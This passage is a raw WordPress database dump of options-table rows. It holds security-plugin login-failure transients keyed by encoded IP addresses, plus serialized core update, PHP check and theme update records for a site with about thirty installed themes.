16bd8e7','1630083358','no'),(123593,'_transient_wflginfl_00000000000000000000ffffd16bd8e7','1','no'),(123667,'_transient_timeout_wflginfl_00000000000000000000ffff8b3b55e0','1630134528','no'),(123668,'_transient_wflginfl_00000000000000000000ffff8b3b55e0','1','no'),(123709,'_transient_timeout_wflginfl_00000000000000000000ffff8fc6362a','1630170613','no'),(123710,'_transient_wflginfl_00000000000000000000ffff8fc6362a','1','no'),(123715,'_transient_timeout_wflginfl_00000000000000000000ffff9b858e42','1630173692','no'),(123716,'_transient_wflginfl_00000000000000000000ffff9b858e42','1','no'),(123878,'_transient_timeout_wflginfl_00000000000000000000ffff9a4a7f5f','1630259421','no'),(123879,'_transient_wflginfl_00000000000000000000ffff9a4a7f5f','6','no'),(123881,'_transient_timeout_wflginfl_00000000000000000000ffffc7f9e6ac','1630259454','no'),(123882,'_transient_wflginfl_00000000000000000000ffffc7f9e6ac','1','no'),(123884,'_transient_timeout_wflginfl_00000000000000000000ffff2d99a002','1630259477','no'),(123885,'_transient_wflginfl_00000000000000000000ffff2d99a002','1','no'),(123886,'_transient_timeout_wflginfl_00000000000000000000ffffb9dc6508','1630259488','no'),(123887,'_transient_wflginfl_00000000000000000000ffffb9dc6508','1','no'),(123903,'_transient_timeout_wflginfl_00000000000000000000ffffcdb9d1e4','1630267715','no'),(123904,'_transient_wflginfl_00000000000000000000ffffcdb9d1e4','1','no'),(123915,'_transient_timeout_wflginfl_00000000000000000000ffffd9aefa69','1630274040','no'),(123916,'_transient_wflginfl_00000000000000000000ffffd9aefa69','1','no'),(123942,'_transient_timeout_wflginfl_00000000000000000000ffffa2f1c819','1630282341','no'),(123943,'_transient_wflginfl_00000000000000000000ffffa2f1c819','1','no'),(123985,'_transient_timeout_wflginfl_00000000000000000000ffffcdb97595','1630303060','no'),(123986,'_transient_wflginfl_00000000000000000000ffffcdb97595','1','no'),(123997,'_transient_timeout_wflginfl_00000000000000000000ffffc5f50b93','1630307045','no'),(123998,'_transient_wflginfl_00000000000000000000ffffc5f50b93','7','no'),(124005,'_transient_timeout_wflginfl_00000000000000000000ffff83996506','1630307743','no'),(124006,'_transient_wflginfl_00000000000000000000ffff83996506','1','no'),(124022,'_transient_timeout_wflginfl_00000000000000000000ffff74446fc2','1630315070','no'),(124023,'_transient_wflginfl_00000000000000000000ffff74446fc2','6','no'),(124024,'_transient_timeout_wflginfl_00000000000000000000ffffd972d786','1630315075','no'),(124025,'_transient_wflginfl_00000000000000000000ffffd972d786','1','no'),(124026,'_transient_timeout_wflginfl_00000000000000000000ffff6bbd1dcf','1630315082','no'),(124027,'_transient_wflginfl_00000000000000000000ffff6bbd1dcf','1','no'),(124028,'_transient_timeout_wflginfl_00000000000000000000ffffc02a7411','1630315089','no'),(124029,'_transient_wflginfl_00000000000000000000ffffc02a7411','1','no'),(124031,'_transient_timeout_wflginfl_00000000000000000000ffff2d99a08c','1630315106','no'),(124032,'_transient_wflginfl_00000000000000000000ffff2d99a08c','1','no'),(124071,'_transient_timeout_wflginfl_00000000000000000000ffffadd0f45b','1630329603','no'),(124072,'_transient_wflginfl_00000000000000000000ffffadd0f45b','1','no'),(124096,'_transient_timeout_wflginfl_00000000000000000000ffff245c011f','1630338187','no'),(124097,'_transient_wflginfl_00000000000000000000ffff245c011f','1','no'),(124102,'_transient_timeout_wflginfl_00000000000000000000ffff67521512','1630339804','no'),(124103,'_transient_wflginfl_00000000000000000000ffff67521512','1','no'),(124118,'_transient_timeout_wflginfl_00000000000000000000ffff8b3b9985','1630351813','no'),(124119,'_transient_wflginfl_00000000000000000000ffff8b3b9985','1','no'),(124169,'_transient_timeout_wflginfl_00000000000000000000ffffa2f390e0','1630366550','no'),(124170,'_transient_wflginfl_00000000000000000000ffffa2f390e0','1','no'),(124216,'_transient_timeout_wflginfl_00000000000000000000ffffcff4e971','1630379157','no'),(124217,'_transient_wflginfl_00000000000000000000ffffcff4e971','1','no'),(124226,'_transient_timeout_wflginfl_00000000000000000000ffff175fd902','1630382338','no'),(124227,'_transient_wflginfl_00000000000000000000ffff175fd902','1','no'),(124281,'_transient_timeout_wflginfl_00000000000000000000ffff788a1e40','1630405027','no'),(124282,'_transient_wflginfl_00000000000000000000ffff788a1e40','1','no'),(124289,'_transient_timeout_wflginfl_00000000000000000000ffffbca69924','1630407981','no'),(124290,'_transient_wflginfl_00000000000000000000ffffbca69924','1','no'),(124292,'_transient_timeout_wflginfl_00000000000000000000ffffb9e6f396','1630408256','no'),(124293,'_transient_wflginfl_00000000000000000000ffffb9e6f396','6','no'),(124294,'_transient_timeout_wflginfl_00000000000000000000ffffc7f9e643','1630408262','no'),(124295,'_transient_wflginfl_00000000000000000000ffffc7f9e643','1','no'),(124297,'_transient_timeout_wflginfl_00000000000000000000ffffb9dc65fd','1630408281','no'),(124298,'_transient_wflginfl_00000000000000000000ffffb9dc65fd','1','no'),(124299,'_transient_timeout_wflginfl_00000000000000000000ffff59a3f9f4','1630408287','no'),(124300,'_transient_wflginfl_00000000000000000000ffff59a3f9f4','1','no'),(124307,'_transient_timeout_wflginfl_00000000000000000000ffff43cd1f32','1630409965','no'),(124308,'_transient_wflginfl_00000000000000000000ffff43cd1f32','1','no'),(124437,'_transient_timeout_wflginfl_00000000000000000000ffffca7e59ae','1630508525','no'),(124438,'_transient_wflginfl_00000000000000000000ffffca7e59ae','2','no'),(124443,'_transient_timeout_wflginfl_00000000000000000000ffffc7f9e653','1630512585','no'),(124444,'_transient_wflginfl_00000000000000000000ffffc7f9e653','1','no'),(124454,'_transient_timeout_wflginfl_00000000000000000000ffff9fcb083a','1630531707','no'),(124455,'_transient_wflginfl_00000000000000000000ffff9fcb083a','1','no'),(124467,'_transient_timeout_wflginfl_00000000000000000000ffff25bb111c','1630544002','no'),(124468,'_transient_wflginfl_00000000000000000000ffff25bb111c','1','no'),(124486,'_transient_timeout_wflginfl_00000000000000000000ffff2a753af8','1630580048','no'),(124487,'_transient_wflginfl_00000000000000000000ffff2a753af8','7','no'),(124542,'_transient_timeout_wflginfl_00000000000000000000ffff3e1cbf02','1630651710','no'),(124543,'_transient_wflginfl_00000000000000000000ffff3e1cbf02','1','no'),(124567,'_transient_timeout_wflginfl_00000000000000000000ffff4d2bd092','1630665280','no'),(124568,'_transient_wflginfl_00000000000000000000ffff4d2bd092','6','no'),(124569,'_transient_timeout_wflginfl_00000000000000000000ffffb9dc65f3','1630665287','no'),(124570,'_transient_wflginfl_00000000000000000000ffffb9dc65f3','1','no'),(124571,'_transient_timeout_wflginfl_00000000000000000000ffff55ca5023','1630665293','no'),(124572,'_transient_wflginfl_00000000000000000000ffff55ca5023','1','no'),(124574,'_transient_timeout_wflginfl_00000000000000000000ffffb9e96417','1630665304','no'),(124575,'_transient_wflginfl_00000000000000000000ffffb9e96417','1','no'),(124652,'_transient_timeout_wflginfl_00000000000000000000ffff3ed271e4','1630698888','no'),(124653,'_transient_wflginfl_00000000000000000000ffff3ed271e4','1','no'),(124659,'_transient_timeout_wflginfl_00000000000000000000ffff088346ba','1630701590','no'),(124660,'_transient_wflginfl_00000000000000000000ffff088346ba','1','no'),(124676,'_transient_timeout_wflginfl_00000000000000000000ffff607dab99','1630711825','no'),(124677,'_transient_wflginfl_00000000000000000000ffff607dab99','1','no'),(124680,'_transient_timeout_wflginfl_00000000000000000000ffff8b3b4ef8','1630712929','no'),(124681,'_transient_wflginfl_00000000000000000000ffff8b3b4ef8','1','no'),(124687,'_transient_timeout_wflginfl_00000000000000000000ffff6d466423','1630713923','no'),(124688,'_transient_wflginfl_00000000000000000000ffff6d466423','1','no'),(124745,'_transient_timeout_wflginfl_00000000000000000000ffff48a72a2d','1630736176','no'),(124746,'_transient_wflginfl_00000000000000000000ffff48a72a2d','1','no'),(124765,'_transient_timeout_wflginfl_00000000000000000000ffff31948eb1','1630744667','no'),(124766,'_transient_wflginfl_00000000000000000000ffff31948eb1','1','no'),(124767,'_transient_timeout_wflginfl_00000000000000000000ffff7da57e45','1630744675','no'),(124768,'_transient_wflginfl_00000000000000000000ffff7da57e45','2','no'),(124787,'_transient_timeout_wflginfl_00000000000000000000ffff70a57899','1630750126','no'),(124788,'_transient_wflginfl_00000000000000000000ffff70a57899','7','no'),(124831,'_transient_timeout_wflginfl_00000000000000000000ffffb2805294','1630761197','no'),(124832,'_transient_wflginfl_00000000000000000000ffffb2805294','1','no'),(124863,'_transient_timeout_wflginfl_00000000000000000000ffff79a57ff4','1630768306','no'),(124864,'_transient_wflginfl_00000000000000000000ffff79a57ff4','7','no'),(124874,'_transient_timeout_wflginfl_00000000000000000000ffffc7f9e6ad','1630771577','no'),(124875,'_transient_wflginfl_00000000000000000000ffffc7f9e6ad','1','no'),(124899,'_transient_timeout_wflginfl_00000000000000000000ffffc1a483c3','1630777925','no'),(124900,'_transient_wflginfl_00000000000000000000ffffc1a483c3','1','no'),(124902,'_transient_timeout_wflginfl_00000000000000000000ffffc3a172e7','1630778119','no'),(124903,'_transient_wflginfl_00000000000000000000ffffc3a172e7','1','no'),(124949,'_transient_timeout_wflginfl_00000000000000000000ffff45a3fb01','1630793009','no'),(124950,'_transient_wflginfl_00000000000000000000ffff45a3fb01','1','no'),(124957,'_transient_timeout_wflginfl_00000000000000000000ffff8e5dfdbd','1630794767','no'),(124958,'_transient_wflginfl_00000000000000000000ffff8e5dfdbd','1','no'),(124970,'_transient_timeout_wflginfl_00000000000000000000ffffa4446440','1630800835','no'),(124971,'_transient_wflginfl_00000000000000000000ffffa4446440','1','no'),(125005,'_transient_timeout_wflginfl_00000000000000000000ffff9f4522d1','1630822710','no'),(125006,'_transient_wflginfl_00000000000000000000ffff9f4522d1','1','no'),(125046,'_transient_timeout_wflginfl_00000000000000000000ffff1fcf244f','1630851023','no'),(125047,'_transient_wflginfl_00000000000000000000ffff1fcf244f','1','no'),(125081,'_transient_timeout_wflginfl_00000000000000000000ffff8b3bd719','1630898310','no'),(125082,'_transient_wflginfl_00000000000000000000ffff8b3bd719','1','no'),(125085,'_transient_timeout_wflginfl_00000000000000000000ffff68f44884','1630903766','no'),(125086,'_transient_wflginfl_00000000000000000000ffff68f44884','1','no'),(125105,'_transient_timeout_wflginfl_00000000000000000000ffffa7ace316','1630936769','no'),(125106,'_transient_wflginfl_00000000000000000000ffffa7ace316','2','no'),(125121,'_transient_timeout_wflginfl_00000000000000000000ffff2e2736ac','1630960239','no'),(125122,'_transient_wflginfl_00000000000000000000ffff2e2736ac','12','no'),(125124,'_transient_timeout_wflginfl_00000000000000000000ffff0dfa63fd','1630961239','no'),(125125,'_transient_wflginfl_00000000000000000000ffff0dfa63fd','1','no'),(125155,'_transient_timeout_wflginfl_00000000000000000000ffff6778b55f','1631003482','no'),(125156,'_transient_wflginfl_00000000000000000000ffff6778b55f','7','no'),(125162,'_transient_timeout_wflginfl_00000000000000000000ffff01df786b','1631008888','no'),(125163,'_transient_wflginfl_00000000000000000000ffff01df786b','14','no'),(125171,'_transient_timeout_wflginfl_00000000000000000000ffff905b4b09','1631013088','no'),(125172,'_transient_wflginfl_00000000000000000000ffff905b4b09','1','no'),(125191,'_transient_timeout_wflginfl_00000000000000000000ffff905b6987','1631018887','no'),(125192,'_transient_wflginfl_00000000000000000000ffff905b6987','1','no'),(125207,'_transient_timeout_wflginfl_00000000000000000000ffff3b3da131','1631026638','no'),(125208,'_transient_wflginfl_00000000000000000000ffff3b3da131','1','no'),(125209,'_transient_timeout_wflginfl_00000000000000000000ffff3d552a33','1631026690','no'),(125210,'_transient_wflginfl_00000000000000000000ffff3d552a33','6','no'),(125335,'_transient_timeout_wflginfl_00000000000000000000ffffa5e3cc39','1631092784','no'),(125336,'_transient_wflginfl_00000000000000000000ffffa5e3cc39','1','no'),(125346,'_transient_timeout_wflginfl_00000000000000000000ffff566827ee','1631095599','no'),(125347,'_transient_wflginfl_00000000000000000000ffff566827ee','1','no'),(125489,'_transient_timeout_wflginfl_00000000000000000000ffff31a4eb6f','1631267744','no'),(125490,'_transient_wflginfl_00000000000000000000ffff31a4eb6f','7','no'),(125493,'_transient_timeout_wflginfl_00000000000000000000ffff68f44eb7','1631270327','no'),(125494,'_transient_wflginfl_00000000000000000000ffff68f44eb7','1','no'),(125542,'_transient_timeout_wflginfl_00000000000000000000ffffda93cee3','1631315913','no'),(125543,'_transient_wflginfl_00000000000000000000ffffda93cee3','7','no'),(125586,'_transient_timeout_wflginfl_00000000000000000000ffffb8abf4ac','1631336289','no'),(125587,'_transient_wflginfl_00000000000000000000ffffb8abf4ac','1','no'),(125605,'_transient_timeout_wflginfl_00000000000000000000ffff3eea1cf4','1631350869','no'),(125606,'_transient_wflginfl_00000000000000000000ffff3eea1cf4','1','no'),(125612,'_transient_timeout_wflginfl_00000000000000000000ffff68f44b21','1631352989','no'),(125613,'_transient_wflginfl_00000000000000000000ffff68f44b21','1','no'),(125659,'_transient_timeout_wflginfl_00000000000000000000ffff495bb820','1631375525','no'),(125660,'_transient_wflginfl_00000000000000000000ffff495bb820','7','no'),(125665,'_transient_timeout_wflginfl_00000000000000000000ffff1f107355','1631375873','no'),(125666,'_transient_wflginfl_00000000000000000000ffff1f107355','1','no'),(125729,'_transient_timeout_wflginfl_00000000000000000000ffff759237c5','1631431226','no'),(125730,'_transient_wflginfl_00000000000000000000ffff759237c5','1','no'),(125731,'_transient_timeout_wflginfl_00000000000000000000ffffda9be140','1631431263','no'),(125732,'_transient_wflginfl_00000000000000000000ffffda9be140','7','no'),(125744,'_transient_timeout_wflginfl_00000000000000000000ffff5d716f22','1631434864','no'),(125745,'_transient_wflginfl_00000000000000000000ffff5d716f22','1','no'),(125812,'_transient_timeout_wflginfl_00000000000000000000ffff68a02bc4','1631458850','no'),(125813,'_transient_wflginfl_00000000000000000000ffff68a02bc4','1','no'),(125829,'_transient_timeout_wflginfl_00000000000000000000ffffa516d337','1631466099','no'),(125830,'_transient_wflginfl_00000000000000000000ffffa516d337','1','no'),(125876,'_transient_timeout_wflginfl_00000000000000000000ffff228631c0','1631502312','no'),(125877,'_transient_wflginfl_00000000000000000000ffff228631c0','1','no'),(125958,'_transient_timeout_wflginfl_00000000000000000000ffff4e862852','1631584579','no'),(125959,'_transient_wflginfl_00000000000000000000ffff4e862852','1','no'),(125962,'_transient_timeout_wflginfl_00000000000000000000ffffbab364cb','1631587118','no'),(125963,'_transient_wflginfl_00000000000000000000ffffbab364cb','1','no'),(125964,'_transient_timeout_wflginfl_00000000000000000000ffffc118f447','1631587142','no'),(125965,'_transient_wflginfl_00000000000000000000ffffc118f447','2','no'),(125967,'_transient_timeout_wflginfl_00000000000000000000ffffc3207fa0','1631587157','no'),(125968,'_transient_wflginfl_00000000000000000000ffffc3207fa0','1','no'),(125969,'_transient_timeout_wflginfl_00000000000000000000ffff71b17453','1631587186','no'),(125970,'_transient_wflginfl_00000000000000000000ffff71b17453','2','no'),(125972,'_transient_timeout_wflginfl_00000000000000000000ffff8a7a94c0','1631587195','no'),(125973,'_transient_wflginfl_00000000000000000000ffff8a7a94c0','1','no'),(125977,'_transient_timeout_wflginfl_00000000000000000000ffff49f28ca3','1631592067','no'),(125978,'_transient_wflginfl_00000000000000000000ffff49f28ca3','7','no'),(126012,'_transient_timeout_wflginfl_00000000000000000000ffffa2f1452e','1631626819','no'),(126013,'_transient_wflginfl_00000000000000000000ffffa2f1452e','1','no'),(126184,'widget_block','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(151904,'_site_transient_update_core','O:8:\"stdClass\":4:{s:7:\"updates\";a:5:{i:0;O:8:\"stdClass\":10:{s:8:\"response\";s:7:\"upgrade\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.1.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.1.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.1.1\";s:7:\"version\";s:5:\"6.1.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";}i:1;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.1.1.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.1.1-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.1.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.1.1\";s:7:\"version\";s:5:\"6.1.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:2;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:57:\"https://downloads.wordpress.org/release/wordpress-6.1.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:57:\"https://downloads.wordpress.org/release/wordpress-6.1.zip\";s:10:\"no_content\";s:68:\"https://downloads.wordpress.org/release/wordpress-6.1-no-content.zip\";s:11:\"new_bundled\";s:69:\"https://downloads.wordpress.org/release/wordpress-6.1-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:3:\"6.1\";s:7:\"version\";s:3:\"6.1\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:3;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.0.3.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-6.0.3.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-6.0.3-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-6.0.3-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"6.0.3\";s:7:\"version\";s:5:\"6.0.3\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}i:4;O:8:\"stdClass\":11:{s:8:\"response\";s:10:\"autoupdate\";s:8:\"download\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.9.5.zip\";s:6:\"locale\";s:5:\"en_US\";s:8:\"packages\";O:8:\"stdClass\":5:{s:4:\"full\";s:59:\"https://downloads.wordpress.org/release/wordpress-5.9.5.zip\";s:10:\"no_content\";s:70:\"https://downloads.wordpress.org/release/wordpress-5.9.5-no-content.zip\";s:11:\"new_bundled\";s:71:\"https://downloads.wordpress.org/release/wordpress-5.9.5-new-bundled.zip\";s:7:\"partial\";s:0:\"\";s:8:\"rollback\";s:0:\"\";}s:7:\"current\";s:5:\"5.9.5\";s:7:\"version\";s:5:\"5.9.5\";s:11:\"php_version\";s:6:\"5.6.20\";s:13:\"mysql_version\";s:3:\"5.0\";s:11:\"new_bundled\";s:3:\"6.1\";s:15:\"partial_version\";s:0:\"\";s:9:\"new_files\";s:1:\"1\";}}s:12:\"last_checked\";i:1675195797;s:15:\"version_checked\";s:5:\"5.8.6\";s:12:\"translations\";a:0:{}}','no'),(155726,'_site_transient_timeout_php_check_9236ad8f2e178e4ce7b4ef5302b7fae9','1673363083','no'),(155727,'_site_transient_php_check_9236ad8f2e178e4ce7b4ef5302b7fae9','a:5:{s:19:\"recommended_version\";s:3:\"7.4\";s:15:\"minimum_version\";s:6:\"5.6.20\";s:12:\"is_supported\";b:1;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),(156795,'_site_transient_timeout_php_check_990bfacb848fa087bcfc06850f5e4447','1675243850','no'),(156796,'_site_transient_php_check_990bfacb848fa087bcfc06850f5e4447','a:5:{s:19:\"recommended_version\";s:3:\"7.4\";s:15:\"minimum_version\";s:6:\"5.6.20\";s:12:\"is_supported\";b:1;s:9:\"is_secure\";b:1;s:13:\"is_acceptable\";b:1;}','no'),(157256,'_site_transient_timeout_theme_roots','1675197596','no'),(157257,'_site_transient_theme_roots','a:31:{s:6:\"Endolf\";s:7:\"/themes\";s:4:\"Kent\";s:7:\"/themes\";s:5:\"Yegor\";s:7:\"/themes\";s:7:\"advance\";s:7:\"/themes\";s:5:\"anima\";s:7:\"/themes\";s:7:\"auberge\";s:7:\"/themes\";s:6:\"cactus\";s:7:\"/themes\";s:9:\"capacious\";s:7:\"/themes\";s:5:\"event\";s:7:\"/themes\";s:8:\"fastblog\";s:7:\"/themes\";s:6:\"gambit\";s:7:\"/themes\";s:6:\"hueman\";s:7:\"/themes\";s:11:\"kidzoo-lite\";s:7:\"/themes\";s:11:\"maxbusiness\";s:7:\"/themes\";s:4:\"mora\";s:7:\"/themes\";s:7:\"newsmag\";s:7:\"/themes\";s:4:\"pine\";s:7:\"/themes\";s:7:\"promote\";s:7:\"/themes\";s:9:\"sg-window\";s:7:\"/themes\";s:7:\"shopone\";s:7:\"/themes\";s:13:\"showcase-lite\";s:7:\"/themes\";s:11:\"skt-pathway\";s:7:\"/themes\";s:9:\"spidermag\";s:7:\"/themes\";s:8:\"storeone\";s:7:\"/themes\";s:14:\"travel-stories\";s:7:\"/themes\";s:14:\"twentynineteen\";s:7:\"/themes\";s:12:\"twentytwenty\";s:7:\"/themes\";s:15:\"twentytwentyone\";s:7:\"/themes\";s:11:\"vision-lite\";s:7:\"/themes\";s:6:\"weblog\";s:7:\"/themes\";s:12:\"wp-barrister\";s:7:\"/themes\";}','no'),(157259,'_site_transient_update_themes','O:8:\"stdClass\":5:{s:12:\"last_checked\";i:1675195798;s:7:\"checked\";a:31:{s:6:\"Endolf\";s:3:\"1.1\";s:4:\"Kent\";s:3:\"1.2\";s:5:\"Yegor\";s:3:\"1.2\";s:7:\"advance\";s:5:\"1.1.9\";s:5:\"anima\";s:5:\"1.0.2\";s:7:\"auberge\";s:5:\"2.1.1\";s:6:\"cactus\";s:5:\"1.0.5\";s:9:\"capacious\";s:5:\"0.0.4\";s:5:\"event\";s:5:\"1.0.7\";s:8:\"fastblog\";s:5:\"1.0.6\";s:6:\"gambit\";s:5:\"1.0.8\";s:6:\"hueman\";s:6:\"3.2.10\";s:11:\"kidzoo-lite\";s:5:\"1.0.7\";s:11:\"maxbusiness\";s:3:\"1.3\";s:4:\"mora\";s:5:\"1.0.2\";s:7:\"newsmag\";s:5:\"2.1.6\";s:4:\"pine\";s:5:\"1.1.0\";s:7:\"promote\";s:5:\"1.7.0\";s:9:\"sg-window\";s:5:\"1.2.1\";s:7:\"shopone\";s:3:\"1.1\";s:13:\"showcase-lite\";s:5:\"1.2.2\";s:11:\"skt-pathway\";s:3:\"1.6\";s:9:\"spidermag\";s:5:\"1.0.8\";s:8:\"storeone\";s:3:\"1.4\";s:14:\"travel-stories\";s:3:\"1.6\";s:14:\"twentynineteen\";s:3:\"2.0\";s:12:\"twentytwenty\";s:3:\"1.7\";s:15:\"twentytwentyone\";s:3:\"1.3\";s:11:\"vision-lite\";s:5:\"1.1.3\";s:6:\"weblog\";s:5:\"1.0.1\";s:12:\"wp-barrister\";s:5:\"1.0.9\";}s:8:\"response\";a:21:{s:7:\"advance\";a:6:{s:5:\"theme\";s:7:\"advance\";s:11:\"new_version\";s:5:\"1.9.0\";s:3:\"url\";s:37:\"https://wordpress.org/themes/advance/\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/theme/advance.1.9.0.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";b:0;}s:5:\"anima\";a:6:{s:5:\"theme\";s:5:\"anima\";s:11:\"new_version\";s:5:\"1.4.1\";s:3:\"url\";s:35:\"https://wordpress.org/themes/anima/\";s:7:\"package\";s:53:\"https://downloads.wordpress.org/theme/anima.1.4.1.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:3:\"5.6\";}s:7:\"auberge\";a:6:{s:5:\"theme\";s:7:\"auberge\";s:11:\"new_version\";s:5:\"2.9.0\";s:3:\"url\";s:37:\"https://wordpress.org/themes/auberge/\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/theme/auberge.2.9.0.zip\";s:8:\"requires\";s:3:\"4.8\";s:12:\"requires_php\";s:3:\"5.6\";}s:9:\"capacious\";a:6:{s:5:\"theme\";s:9:\"capacious\";s:11:\"new_version\";s:5:\"1.1.1\";s:3:\"url\";s:39:\"https://wordpress.org/themes/capacious/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/capacious.1.1.1.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:3:\"7.0\";}s:5:\"event\";a:6:{s:5:\"theme\";s:5:\"event\";s:11:\"new_version\";s:5:\"1.2.0\";s:3:\"url\";s:35:\"https://wordpress.org/themes/event/\";s:7:\"package\";s:53:\"https://downloads.wordpress.org/theme/event.1.2.0.zip\";s:8:\"requires\";s:3:\"5.8\";s:12:\"requires_php\";s:3:\"5.6\";}s:8:\"fastblog\";a:6:{s:5:\"theme\";s:8:\"fastblog\";s:11:\"new_version\";s:5:\"1.6.5\";s:3:\"url\";s:38:\"https://wordpress.org/themes/fastblog/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/theme/fastblog.1.6.5.zip\";s:8:\"requires\";s:3:\"4.7\";s:12:\"requires_php\";b:0;}s:6:\"gambit\";a:6:{s:5:\"theme\";s:6:\"gambit\";s:11:\"new_version\";s:5:\"2.0.9\";s:3:\"url\";s:36:\"https://wordpress.org/themes/gambit/\";s:7:\"package\";s:54:\"https://downloads.wordpress.org/theme/gambit.2.0.9.zip\";s:8:\"requires\";s:3:\"5.2\";s:12:\"requires_php\";s:3:\"5.6\";}s:6:\"hueman\";a:6:{s:5:\"theme\";s:6:\"hueman\";s:11:\"new_version\";s:6:\"3.7.23\";s:3:\"url\";s:36:\"https://wordpress.org/themes/hueman/\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/theme/hueman.3.7.23.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:3:\"5.3\";}s:11:\"kidzoo-lite\";a:6:{s:5:\"theme\";s:11:\"kidzoo-lite\";s:11:\"new_version\";s:3:\"1.1\";s:3:\"url\";s:41:\"https://wordpress.org/themes/kidzoo-lite/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/kidzoo-lite.1.1.zip\";s:8:\"requires\";s:3:\"4.4\";s:12:\"requires_php\";b:0;}s:11:\"maxbusiness\";a:6:{s:5:\"theme\";s:11:\"maxbusiness\";s:11:\"new_version\";s:3:\"1.4\";s:3:\"url\";s:41:\"https://wordpress.org/themes/maxbusiness/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/maxbusiness.1.4.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";b:0;}s:7:\"newsmag\";a:6:{s:5:\"theme\";s:7:\"newsmag\";s:11:\"new_version\";s:5:\"2.4.4\";s:3:\"url\";s:37:\"https://wordpress.org/themes/newsmag/\";s:7:\"package\";s:55:\"https://downloads.wordpress.org/theme/newsmag.2.4.4.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:3:\"7.0\";}s:9:\"sg-window\";a:6:{s:5:\"theme\";s:9:\"sg-window\";s:11:\"new_version\";s:5:\"1.2.3\";s:3:\"url\";s:39:\"https://wordpress.org/themes/sg-window/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/sg-window.1.2.3.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";b:0;}s:7:\"shopone\";a:6:{s:5:\"theme\";s:7:\"shopone\";s:11:\"new_version\";s:3:\"1.3\";s:3:\"url\";s:37:\"https://wordpress.org/themes/shopone/\";s:7:\"package\";s:53:\"https://downloads.wordpress.org/theme/shopone.1.3.zip\";s:8:\"requires\";s:3:\"5.0\";s:12:\"requires_php\";s:3:\"5.6\";}s:9:\"spidermag\";a:6:{s:5:\"theme\";s:9:\"spidermag\";s:11:\"new_version\";s:5:\"1.1.7\";s:3:\"url\";s:39:\"https://wordpress.org/themes/spidermag/\";s:7:\"package\";s:57:\"https://downloads.wordpress.org/theme/spidermag.1.1.7.zip\";s:8:\"requires\";b:0;s:12:\"requires_php\";s:3:\"5.6\";}s:8:\"storeone\";a:6:{s:5:\"theme\";s:8:\"storeone\";s:11:\"new_version\";s:5:\"2.1.5\";s:3:\"url\";s:38:\"https://wordpress.org/themes/storeone/\";s:7:\"package\";s:56:\"https://downloads.wordpress.org/theme/storeone.2.1.5.zip\";s:8:\"requires\";s:3:\"5.0\";s:12:\"requires_php\";s:3:\"5.6\";}s:14:\"twentynineteen\";a:6:{s:5:\"theme\";s:14:\"twentynineteen\";s:11:\"new_version\";s:3:\"2.4\";s:3:\"url\";s